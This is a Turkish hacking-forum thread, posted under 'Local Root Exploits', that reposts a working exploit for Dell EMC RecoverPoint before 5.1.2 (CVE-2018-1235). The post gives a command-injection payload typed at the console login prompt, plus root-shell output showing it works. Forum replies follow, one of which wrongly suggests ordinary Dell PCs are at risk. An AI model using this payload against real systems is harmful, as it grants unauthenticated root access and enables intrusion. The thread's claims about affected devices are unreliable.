1.                                                

Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution

'Local Root Exploits' forumunda KaliBot tarafından 22 Haziran 2018 tarihinde açılan konu

  1. KaliBot

    KaliBot Albay

    Katılım:
    30 Haziran 2015
    Mesaj:
    539
    Beğeniler:
    45
    Ödül Puanları:
    12
    Web Sitesi:

    Kod:
    # Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution
    # Date: 2018-06-21
    # Exploit Author: Paul Taylor
    # Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
    # Vendor Advisory: DSA-2018-095
    # Vendor KB: https://support.emc.com/kb/521234
    # Github: https://github.com/bao7uo/dell-emc_recoverpoint
    # Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities
    # Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
    # CVE: CVE-2018-1235
     
    # 1. Description
    # An OS command injection vulnerability exists in the mechanism which processes usernames
    # which are presented for authentication, allowing unauthenticated root access
    # via tty console login.
     
    # 2. Proof of Concept
    # Inject into local tty console login prompt
    recoverpoint login: $(bash > &2)
    [email protected]:/# id
    uid=0(root) gid=0(root) groups=0(root)
    [email protected]:/#
     
    MrX, tababa86 ve Al-Farabi bunu beğendi.
  2. tababa86

    tababa86 Albay

    Katılım:
    12 Mart 2016
    Mesaj:
    948
    Beğeniler:
    138
    Ödül Puanları:
    43
    Cinsiyet:
    Erkek
    Şehir:
    Kore
    bende bir tane dell bilgisayar var normal işlerde kullanıyorum eski ama.İşe yarar mı merak ettiim doğrusu...
     
    Al-Farabi ve KaliBot bunu beğendi.
  3. KaliBot

    KaliBot Albay

    Katılım:
    30 Haziran 2015
    Mesaj:
    539
    Beğeniler:
    45
    Ödül Puanları:
    12
    Web Sitesi:
    Denemekte fayda vardır.
     
    Al-Farabi bunu beğendi.
  4. tababa86

    tababa86 Albay

    Katılım:
    12 Mart 2016
    Mesaj:
    948
    Beğeniler:
    138
    Ödül Puanları:
    43
    Cinsiyet:
    Erkek
    Şehir:
    Kore
    bu komutla root olması ilginç..benim bilgisayar eski recovery mode yok.Yeni dell sahiplerinin dikkatli olması
    lazım.Hem local hemde remote saldırabilirler.
     
    Al-Farabi bunu beğendi.

Bu Sayfayı Paylaş

Share